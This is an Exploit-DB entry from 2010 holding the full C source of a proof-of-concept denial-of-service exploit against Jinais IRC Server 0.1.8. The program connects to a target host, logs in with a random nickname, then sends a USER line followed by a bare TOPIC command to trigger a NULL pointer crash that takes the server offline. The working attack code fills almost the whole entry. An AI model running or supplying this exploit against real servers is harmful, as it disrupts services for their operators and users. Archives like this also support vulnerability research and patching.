Jinais IRC Server 0.1.8 - Null Pointer (PoC)

EDB-ID:

11855

CVE:

N/A

EDB Verified:

Author:

Salvatore Fresta

Type:

dos

Exploit:   /  

Platform:

Multiple

Date:

2010-03-23

Vulnerable App: 
/*

    Jinais IRC Server 0.1.8 - NULL Pointer PoC
    
    This PoC will disconnect the affected target IRC server using
    a NULL Pointer vulnerability.

    Copyright 2010 Salvatore Fresta aka Drosophila

    This program is free software; you can redistribute it and/or
    modify it under the terms of  the  GNU General Public License
    as published by the  Free Software Foundation; either version 
    2 of the License, or (at your option) any later version.

    This program  is  distributed  in the hope  that  it  will be
    useful, but WITHOUT ANY WARRANTY;  without  even the  implied
    warranty  of  MERCHANTABILITY  or  FITNESS  FOR  A PARTICULAR
    PURPOSE. See the GNU General Public License for more details.

    You should have  received a copy  of  the  GNU General Public
    License along  with  this program;  if not, write to the Free
    Software Foundation,Inc., 59 Temple Place, Suite 330, Boston,
    MA 02111-1307 USA

    http://www.gnu.org/licenses/gpl-2.0.txt

*/

#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <stdlib.h>
#include <time.h>
#ifdef WIN32
	#include <winsock.h>
	#define close closesocket
#else
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <netinet/in.h>
	#include <unistd.h>
	#include <errno.h>
	#include <netdb.h>
#endif

#define BUFF_SIZE 256
#define DEFAULT_PORT 4002


int socket_connect(char *server, int port);
char *socket_receive(int sock, int tout);
int socket_send(int socket, char *buffer, size_t size);
int socket_close(int socket);



int main(int argc, char *argv[]) {

	int sd,
	    rnd_num,
	    len,
	    port = DEFAULT_PORT;
	char pkg[BUFF_SIZE],
	     *response = NULL,
	     *host = NULL;
	
	if(argc < 2) {
		printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
		       "\nhttp://www.salvatorefresta.net"
		       "\n"
		       "\nUsage: %s <target_hostname> <port> (default: %d)\n\n", argv[0], port);
		return -1;
	}
	
	srand(time(NULL));
	
	host = argv[1];
	if(argc > 2) port = atoi(argv[2]);
	
	printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
		   "\nhttp://www.salvatorefresta.net"
		   "\n\n[*] Connecting to %s:%hu...", host, port);
	
	sd = socket_connect(host, port);
	if(sd < 0) {
		printf("\n[-] Error on connect!\n\n");
		return -1;
	}
	
	printf("\n[+] Connection estabilished"
	       "\n[*] Loggin to IRC server...");
	
login:	
	
	rnd_num = rand()%100+1;
	
	len = snprintf(pkg, sizeof(pkg), "NICK randomnickname%d\r\n", rnd_num);
	if(len < 0 || len > sizeof(pkg)) {
		perror("\n[-] Error: snprintf");
		socket_close(sd);
		return -1;
	}
	
	if(socket_send(sd, pkg, len) < 0) {
		perror("\n[-] Error: socket_send");
		socket_close(sd);
		return -1;
	}
	
	response = socket_receive(sd, 3);
	if(!response) {
		perror("\n[-] Error: socket_receive");
		socket_close(sd);
		return -1;
	}
	
	if(strstr(response, "Nickname is already in use")) {
		free(response);
		goto login;
	}
	free(response);
	
	printf("\n[+] Login successfully"
	       "\n[*] Data sending...");
	       
	rnd_num = rand()%100+1;
	len = snprintf(pkg, sizeof(pkg), "USER blabla\r\nTOPIC #ch%d\r\n", rnd_num);
	if(len < 0 || len > sizeof(pkg)) {
		perror("\n[-] Error: snprintf");
		socket_close(sd);
		return -1;
	}
	
	if(socket_send(sd, pkg, len) < 0) {
		perror("\n[-] Error: socket_send");
		socket_close(sd);
		return -1;
	}
	
	response = socket_receive(sd, 3);
	if(!response) {
		perror("\n[-] Error: socket_receive");
		socket_close(sd);
		return -1;
	}
	
	socket_close(sd);
	
	printf("\n[+] Data sent successfully"
	       "\n[+] Connection closed\n\n");
	
	return 0;
	
}



int socket_connect(char *server, int port) {

	int sd;
	struct sockaddr_in sock;
	struct hostent *host = NULL;
	
#ifdef WIN32	
	WSADATA wsadata;
    if(WSAStartup(MAKEWORD(1,0), &wsadata)) return -1;
#endif
	
	memset(&sock, 0, sizeof(sock));
	
	if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
	
	sock.sin_family = AF_INET;
	sock.sin_port = htons(port);
	
	if(!(host=gethostbyname(server))) return -1;
	
	sock.sin_addr = *((struct in_addr *)host->h_addr);
	
	if(connect(sd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;
	
	return sd;
   
}



char *socket_receive(int sock, int tout) {

	int ret,
	    byte_recv,
	    oldpkglen = 0,
	    pkglen = 0;
	char *buffer = NULL, 
	     tmp[128];
	struct timeval timeout;
	fd_set input;
	
	if(sock < 0) return NULL;
	
	while (1) {
		
		FD_ZERO(&input);
		FD_SET(sock, &input);
		
		if(tout > 0) {
			timeout.tv_sec  = tout;
			timeout.tv_usec = 0;
			ret = select(sock + 1, &input, NULL, NULL, &timeout);
		}
		else
			ret = select(sock + 1, &input, NULL, NULL, NULL);
	
		if (!ret) break;
		if (ret < 0) return NULL;
		
		byte_recv = recv(sock, tmp, sizeof(tmp), 0);
		
		if(byte_recv < 0) return NULL;
		
		if(!byte_recv) break;
		
		oldpkglen = pkglen;
		pkglen += byte_recv;
		
		buffer = (char *) realloc(buffer, pkglen+1);
		
		if(!buffer) return NULL;
		
		memcpy(buffer+oldpkglen, tmp, byte_recv);
	
	}
	
	if(buffer) buffer[pkglen] = 0;
	
	return buffer;
   
}



int socket_send(int socket, char *buffer, size_t size) {
	
	if(socket < 0) return -1;

	return send(socket, buffer, size, 0) < 0 ? -1 : 0;
	
}



int socket_close(int socket) {
	
	if(socket < 0) return -1;
	
	return close(socket) < 0 ? -1 : 0;
	
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services